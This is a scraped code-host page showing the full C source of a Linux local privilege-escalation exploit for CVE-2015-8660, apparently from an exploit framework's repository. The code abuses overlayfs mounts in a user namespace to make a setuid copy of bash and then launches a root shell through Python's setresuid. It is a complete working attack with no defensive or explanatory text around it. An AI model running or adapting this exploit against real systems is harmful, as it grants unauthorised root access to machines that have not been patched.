Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/external/source/exploits/CVE-2015-8660/8660.c
Views: 11777
#include <stdio.h>1#include <sched.h>2#include <stdlib.h>3#include <unistd.h>4#include <sched.h>5#include <sys/stat.h>6#include <sys/types.h>7#include <sys/mount.h>8#include <sys/types.h>9#include <signal.h>10#include <fcntl.h>11#include <string.h>12#include <linux/sched.h>13#include <sys/wait.h>1415static char child_stack[1024*1024];1617static int18child_exec(void *stuff)19{20system("rm -rf /tmp/haxhax");21mkdir("/tmp/haxhax", 0777);22mkdir("/tmp/haxhax/w", 0777);23mkdir("/tmp/haxhax/u",0777);24mkdir("/tmp/haxhax/o",0777);2526if (mount("overlay", "/tmp/haxhax/o", "overlay", MS_MGC_VAL, "lowerdir=/bin,upperdir=/tmp/haxhax/u,workdir=/tmp/haxhax/w") != 0) {27fprintf(stderr,"mount failed..\n");28}2930chmod("/tmp/haxhax/w/work",0777);31chdir("/tmp/haxhax/o");32chmod("bash",04755);33chdir("/");34umount("/tmp/haxhax/o");35return 0;36}3738int39main(int argc, char **argv)40{41int status;42pid_t wrapper, init;43int clone_flags = CLONE_NEWNS | SIGCHLD;44struct stat s;4546if((wrapper = fork()) == 0) {47if(unshare(CLONE_NEWUSER) != 0)48fprintf(stderr, "failed to create new user namespace\n");4950if((init = fork()) == 0) {51pid_t pid =52clone(child_exec, child_stack + (1024*1024), clone_flags, NULL);53if(pid < 0) {54fprintf(stderr, "failed to create new mount namespace\n");55exit(-1);56}5758waitpid(pid, &status, 0);5960}6162waitpid(init, &status, 0);63return 0;64}6566usleep(300000);6768wait(NULL);6970stat("/tmp/haxhax/u/bash",&s);7172if(s.st_mode == 0x89ed)73execl("/tmp/haxhax/u/bash","bash","-p","-c","rm -rf /tmp/haxhax;python -c \"import os;os.setresuid(0,0,0);os.execl('/bin/bash','bash');\"",NULL);7475fprintf(stderr,"couldn't create suid :(\n");76return -1;77}787980